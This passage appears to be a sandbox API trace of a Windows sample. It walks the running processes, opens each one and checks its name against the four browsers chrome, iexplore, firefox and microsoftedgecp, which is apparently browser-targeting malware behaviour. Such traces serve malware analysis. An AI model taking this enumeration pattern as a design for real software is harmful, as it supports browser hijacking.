	[0229.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.647] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.647] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0229.648] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6598
	[0229.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.649] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0229.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.649] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.650] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0229.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.650] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.650] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0229.651] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x659c
	[0229.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.651] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0229.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.651] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.652] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0229.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.652] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.652] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0229.653] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x65a0
	[0229.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.653] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0229.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.654] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.654] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0229.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.655] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.655] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0229.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x65a4
	[0229.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.656] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0229.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.656] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.656] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0229.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.657] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.657] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0229.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x65a8
	[0229.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.658] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0229.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.658] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.658] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0229.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.659] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.659] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.660] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x65ac
	[0229.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.660] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.660] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.660] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.661] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.661] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x65b0
	[0229.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.662] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.662] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.663] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.663] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.663] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x65b4
	[0229.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.665] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.665] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.666] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.666] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.666] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x65b8
	[0229.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.667] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.667] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.668] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.668] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.668] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x65bc
	[0229.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.669] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.670] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.670] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.670] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.671] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.671] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x65c0
	[0229.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.672] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.672] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.672] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.673] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.673] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.674] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x65c4
	[0229.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.674] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.674] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.674] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.675] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0229.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x65c8
	[0229.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.676] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0229.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.676] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.677] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0229.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.677] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.677] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x65cc
	[0229.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.678] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.679] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.679] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.680] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.681] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0229.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x65d0
	[0229.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.682] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.682] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.682] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.683] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.683] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0229.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x65d4
	[0229.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.684] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0229.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.684] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.685] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0229.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.685] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.685] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x65d8
	[0229.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.686] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.686] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.687] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.687] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.687] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0229.688] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x65dc
	[0229.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.688] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0229.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.689] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.689] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0229.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.689] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.690] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0229.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x65e0
	[0229.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.691] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0229.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.691] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.691] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0229.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.692] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.692] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0229.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x65e4
	[0229.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.693] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0229.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.693] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.693] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0229.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.694] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.694] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0229.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x65e8
	[0229.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.696] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0229.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.696] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.696] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0229.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.697] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.697] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0229.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0229.698] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0229.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x65ec
	[0229.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.699] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0229.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.699] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.700] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0229.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.701] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.701] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0229.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x65f0
	[0229.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.703] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0229.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.703] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.704] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0229.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.704] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.704] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0229.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x65f4
	[0229.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.705] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0229.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.706] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.706] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0229.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.706] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.707] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
